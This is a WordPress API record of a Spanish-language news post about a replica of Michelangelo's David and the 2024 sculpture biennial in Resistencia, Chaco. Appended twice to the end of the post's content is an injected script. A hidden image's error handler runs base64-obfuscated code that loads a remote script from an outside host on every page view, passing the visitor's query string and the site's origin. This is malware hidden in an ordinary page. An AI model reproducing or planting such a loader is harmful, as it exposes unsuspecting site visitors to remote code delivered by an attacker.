{"id":3630,"date":"2024-02-07T10:45:44","date_gmt":"2024-02-07T13:45:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3630"},"modified":"2025-08-14T00:01:14","modified_gmt":"2025-08-14T03:01:14","slug":"la-replica-del-david-de-miguel-angel-y-la-bienal-de-esculturas-en-chaco","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3630","title":{"rendered":"La r\u00e9plica del David de Miguel Angel y la Bienal de Esculturas en Chaco"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a4e7265be36a76be4fcdaff138bf71ce\" style=\"background-color:#a26607f7\"><em>El 6 de marzo la capital provincial tendr\u00e1 la esperada inauguraci\u00f3n de una r\u00e9plica de la c\u00e9lebre obra. En tanto,\u00a0Resistencia\u00a0ser\u00e1 escenario del lanzamiento de la XIII Bienal Internacional de Escultura que se realizar\u00e1 del 13 al 21 de julio.<\/em><\/h4>\n\n\n\n<h6 class=\"wp-block-heading has-vivid-cyan-blue-color has-text-color has-link-color wp-elements-305c7252ec356f8c9e5078448f5766b9\"><em>Por: Marina Sep\u00falveda<\/em><\/h6>\n\n\n\n<p><strong>El 6 de marzo<\/strong>, d\u00eda internacional del escultor, la ciudad chaque\u00f1a de&nbsp;<strong>Resistencia&nbsp;<\/strong>ser\u00e1 escenario de la esperada inauguraci\u00f3n del \u201cDavid\u201d,&nbsp;<strong>una r\u00e9plica de la c\u00e9lebre creaci\u00f3n de Miguel Angel que estar\u00e1 emplazada en el Parque 2 de Febrero<\/strong>&nbsp;y que forma parte de una iniciativa del artista chaque\u00f1o Fabriciano G\u00f3mez, art\u00edfice tambi\u00e9n de la Bienal de Escultura de Chaco, cuya edici\u00f3n 2024 se lanzar\u00e1 oficialmente ese mismo d\u00eda.<\/p>\n\n\n\n<p>Resistencia ser\u00e1 escenario del lanzamiento&nbsp;<strong>de la XIII Bienal Internacional de Escultura que se realizar\u00e1 del 13 al 21 de julio en la ciudad del norte del pa\u00eds y que en esta oportunidad ofrecer\u00e1 a los artistas como material de trabajo el metal (chapa lisa laminada), a diferencia del m\u00e1rmol travertino de San Juan que se utiliz\u00f3 en la \u00faltima edici\u00f3n, realizada hace dos a\u00f1os<\/strong>.<\/p>\n\n\n\n<p>Impulsada por la&nbsp;<strong>Fundaci\u00f3n Urunday y organizada junto al Gobierno provincial, la Bienal de Escultura es un evento internacional que sit\u00faa a Resistencia como centro art\u00edstico en el mundo<\/strong>, adem\u00e1s de ser un gran motor de la industria cultural que tracciona el turismo y la gastronom\u00eda, y que otra vez volver\u00e1 a reunir a 10 prestigiosos escultores de distintos pa\u00edses, cuyos nombres se dar\u00e1n a conocer en el lanzamiento.<\/p>\n\n\n\n<p>Una decisi\u00f3n dif\u00edcil teniendo en cuenta que al cierre de la convocatoria a finales de noviembre los organizadores recibieron la postulaci\u00f3n de 157 escultores de 55 pa\u00edses, entre los cuales se encuentran \u00abrenombrados artistas de la escena internacional\u00bb, para participar en el certamen que otorga 5.000 d\u00f3lares de premio a cada participante adem\u00e1s de las distinciones que otorga el jurado en esa gran fiesta final que cierra el evento.<\/p>\n\n\n\n<p>Pero por sobre todo, el concurso escult\u00f3rico al aire libre otorgar\u00e1 a la ciudad nuevas obras originales, in\u00e9ditas y contempor\u00e1neas que se sumar\u00e1n a las 670 emplazadas en ese gran museo a cielo abierto que es Resistencia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bc239476773_1200.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u00abEn esta edici\u00f3n se va a trabajar el acero\u00bb, dice a T\u00e9lam Jos\u00e9 Sebasti\u00e1n Eidman, presidente Fundaci\u00f3n Urunday. Se trata de un material no perecedero y apto para estar a la intemperie, igual que los utilizados anteriormente ya que van rotando entre bienales, para equilibrar \u00ablas materialidades de las diferentes obras que despu\u00e9s pasan al espacio p\u00fablico\u00bb de la ciudad y a su vez renuevan, mejoran y enriquecen la experiencia del visitante al \u00abtaller a cielo abierto\u00bb donde trabajan los escultores durante el evento.<\/p>\n\n\n\n<p><strong>La elecci\u00f3n del 6 de marzo elegida para este lanzamiento es un homenaje doble<\/strong>: es el D\u00eda Internacional del Escultor decidido por ser el del nacimiento de uno de los m\u00e1s grandes escultores de la historia como fue Miguel \u00c1ngel Buonarroti (1475- 1564), cuyo monumental \u00abDavid\u00bb original nacido de un solo bloque de m\u00e1rmol de Carrara est\u00e1 bajo techo en la ciudad de Florencia, Italia, y cuya copia chaque\u00f1a ser\u00e1 un atractivo para el turismo y el mercado cultural, pero tambi\u00e9n \u00abuna pieza de estudio\u00bb que completa el sue\u00f1o del escultor Fabriciano G\u00f3mez (1944-2021), impulsor de la Bienal y de la llegada a Resistencia de la r\u00e9plica de la famosa estatua.<\/p>\n\n\n\n<p>As\u00ed, en el marco de celebraci\u00f3n de los 36 a\u00f1os de concursos escult\u00f3ricos iniciado en la Plaza 25 de Mayo, se inaugurar\u00e1 al fin la copia digital del calco que atesora el Museo de la C\u00e1rcova dependiente de la UNA, en Buenos Aires, del \u00abDavid\u00bb que con sus 5,17 metros de altura se sumar\u00e1 \u00aben \u00edntimo di\u00e1logo, con los primeros premios de las bienales que habitan el parque de las esculturas de la ciudad\u00bb, destaca la Fubdaci\u00f3n.<\/p>\n\n\n\n<p>Una inauguraci\u00f3n pensada en principio para el 26 de junio de 2023,&nbsp;<strong>d\u00eda del cumplea\u00f1os de G\u00f3mez que tuvo que ser pospuesta para el 8 de septiembre, aniversario de su fallecimiento, y que tendr\u00e1 en breve terminada la base de su emplazamiento y luego la ansiada inauguraci\u00f3n<\/strong>.<\/p>\n\n\n\n<p>\u00abFabri anhelaba tener esa obra como parte de la colecci\u00f3n de las piezas que integran hoy el patrimonio de Resistencia. \u00c9l tuvo la suerte de consagrarse y vivir en Europa. Tuvo la posibilidad de ver el David de Miguel \u00c1ngel en la Galer\u00eda de la Academia y como siempre estaba pensando qu\u00e9 traer al Chaco, me contaba, que en ese momento lo invadi\u00f3 la angustia y quiz\u00e1s la certeza de que muchos de nosotros, probablemente, nunca tendr\u00edamos la oportunidad de ver esa obra considerada como una de las m\u00e1s importante de la historia del arte\u00bb, cuenta&nbsp;<strong>Eidman<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bc2394af38e_1200.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>El nuevo calco del \u00abDavid\u00bb es un proyecto definido como \u00abuna construcci\u00f3n colectiva\u00bb por la participaci\u00f3n de distintos actores, algo que no lleg\u00f3 a ver G\u00f3mez, fallecido un mes antes del permiso para el escaneado no invasivo del calco de la C\u00e1rcova. Y si bien en septiembre pasado no se pudo inaugurar, la Fundaci\u00f3n igual abri\u00f3 las puertas a la comunidad del anexo de conservaci\u00f3n y restauraci\u00f3n de su organizaci\u00f3n, donde la escultura a\u00fan descansa acostado, guardada.<\/p>\n\n\n\n<p>Lo que trasciende es la combinatoria de arte y tecnolog\u00eda desde el \u00abescaneado de alta precisi\u00f3n\u00bb, los retoques digitales comparando con la obra original florentina, llevado adelante por las artistas Gisela Kraisman y Denise Di Federico (empresa Dryada) para recrear esta nueva copia, junto a otros artistas, y siendo parte de una ecuaci\u00f3n que cont\u00f3 con los c\u00e1lculos de ingenieros de la Facultad de Ingenier\u00eda de la Universidad Nacional del Nordeste para la estructura interna de la estatua, o la comprobaci\u00f3n de la resistencia del material en su emplazamiento definitivo, por ejemplo.<\/p>\n\n\n\n<p>El proceso de construcci\u00f3n, fue crear \u00aba partir del gemelo digital el molde digital que se imprimi\u00f3 en 3D\u00bb, luego el molde dispuesto junto al esqueleto de metal se procedi\u00f3 a colar \u00abuna aleaci\u00f3n de materiales de con carbonato de calcio y resinas navales de alt\u00edsima resistencia que al unirse con otros materiales -y solidificarse- lograron la consistencia y resistencia de la piedra, pero mucho m\u00e1s liviana\u00bb, detalla.<\/p>\n\n\n\n<p>Lo que traer\u00e1 esta edici\u00f3n es el \u00ababordaje novedoso\u00bb del cruce entre arte y tecnolog\u00eda, seg\u00fan se\u00f1ala Eidman, que adem\u00e1s del \u00abDavid\u00bb presentar\u00e1 un logo de identidad visual en forma de gota creado con la asistencia de la inteligencia Artificial (IA).<\/p>\n\n\n\n<p>Se tata de y una imagen creada por el equipo de dise\u00f1o para ayudar \u00aba interpretar algunos conceptos que forman parte tambi\u00e9n del proceso creativo\u00bb, refiere.<\/p>\n\n\n\n<p>\u00abEsta Bienal tiene como novedad la posibilidad de generar un espacio de discusi\u00f3n e intercambio alrededor de las nuevas tecnolog\u00edas aplicadas al arte como la IA, la impresi\u00f3n 3D y las experiencias en entornos inmersivos digitales tridimensionales, y c\u00f3mo de alguna manera \u00e9stas afectan las producciones art\u00edsticas, es decir, \u00bfson complementarias del proceso creativo, son sustitutas?\u00bb, adelanta Eidman sobre \u00ablo que se va a discutir en el espacio acad\u00e9mico de esta Bienal\u00bb.<\/p>\n\n\n\n<p>Claro, una escultura hecha a \u00abpartir de un gemelo digital fabricado, realizado, construido para la intemperie y que sea emplazado en el espacio p\u00fablico realmente es una noticia interesante y un testimonio de c\u00f3mo las nuevas tecnolog\u00edas hoy empiezan a dialogar con los lenguajes del arte y a resignificarlos\u00bb, resume. Y agrega acerca de lo tecnol\u00f3gico: \u00abclaramente tiene un rol protag\u00f3nico en los tiempos que corren\u00bb.<\/p>\n\n\n\n<p>Pero m\u00e1s all\u00e1 de los dos eventos centrales, tambi\u00e9n se dar\u00e1n a conocer los artistas que participar\u00e1n en el \u00abEncuentro de Escultores invitados Argentinos y Latinoamericanos\u00bb quienes trabajar\u00e1n con t\u00e9cnicas y materiales diversos, en paralelo a la atracci\u00f3n principal.<\/p>\n\n\n\n<p><strong>Otro de los cl\u00e1sico de la Bienal ser\u00e1 el Premio Desaf\u00edo que en su 9na edici\u00f3n en el que participan estudiantes avanzados de escuelas de arte del pa\u00eds<\/strong>, concurso que se desarrollar\u00e1 del 16 al 18 de julio y tiene abierta la convocatoria hasta el 30 de marzo, y otorga un primer premio adquisici\u00f3n de 150.000 mil pesos.<\/p>\n\n\n\n<p>Durante la Bienal tendr\u00e1n lugar otros encuentros como el de los artesanos de pueblos originarios y maestros artesanos argentinos que congregar\u00e1 unos 360, as\u00ed como el \u00e1mbito acad\u00e9mico con el IV Congreso Internacional de Artes organizado desde la Universidad Nacional del Nordeste y el II Congreso Internacional de Derecho del Arte, adem\u00e1s de un seminario de arte, derecho y patrimonio y urbanismo.<\/p>\n\n\n\n<p>Espacios de reflexi\u00f3n que en un marco tan particular aborda los debates contempor\u00e1neos sobre el arte, complementando la experiencia de observar y vivir junto a los escultores la creaci\u00f3n de las obras lo que hace las delicias del numeroso p\u00fablico que sigue atenta y cr\u00edticamente cada uno de los trabajos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bc23949307f_1200.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Otros \u00e1mbitos ser\u00e1n el \u00abesc\u00e9nico\u00bb con una grilla art\u00edstica que se desplegar\u00e1 en los distintos escenarios, as\u00ed como la gran feria en la cual participar\u00e1n 630 expositores, abriendo \u00abel abanico de la industria y el comercio chaque\u00f1o y regional, entre otras variadas propuestas y sorpresas que ser\u00e1n tambi\u00e9n reveladas en la ocasi\u00f3n\u00bb, informan.<\/p>\n\n\n\n<p>Con actividades libres y gratuitas, la Bienal de Escultura Chaco, tiene el sost\u00e9n y aporte del \u00e1mbito estatal y privado como sinergia positiva, y sus sucesivas ediciones han \u00abgenerado un sentimiento identitario germinando en la comunidad la valoraci\u00f3n y el cuidado\u00bb, adem\u00e1s de las charlas o el mate compartidos a los escultores por el expectante y curioso p\u00fablico.<\/p>\n\n\n\n<p>A su vez, no faltar\u00e1n las mediciones de impacto econ\u00f3mico con un nuevo modelo, o ambiental con la Huella de Carbono desde 2022, para avanzar en \u00abuna Bienal que sea Carbono neutral\u00bb.<\/p>\n\n\n\n<p>Polo de atracci\u00f3n regional, el predio del Parque Intercultural 2 de Febrero en que se desarrollar\u00e1 la Bienal, recibi\u00f3 unos 600 mil visitantes en 2018 y 800 mil en 2022 en los 10 d\u00edas de Bienal -y ocupaci\u00f3n hotelera plena-, por lo que los organizadores esperan una mayor afluencia de p\u00fablico este a\u00f1o.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/654160-chaco-resistencia-bienal-de-esculturas.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 6 de marzo la capital provincial tendr\u00e1 la esperada inauguraci\u00f3n de una r\u00e9plica de la c\u00e9lebre obra. En tanto,\u00a0Resistencia\u00a0ser\u00e1 escenario del lanzamiento de la XIII Bienal Internacional de Escultura que se realizar\u00e1 del 13 al 21 de julio. Por: Marina Sep\u00falveda El 6 de marzo, d\u00eda internacional del escultor, la ciudad chaque\u00f1a de&nbsp;Resistencia&nbsp;ser\u00e1 escenario [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3631,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3630","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3630"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3630"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3630\/revisions"}],"predecessor-version":[{"id":6861,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3630\/revisions\/6861"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3631"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}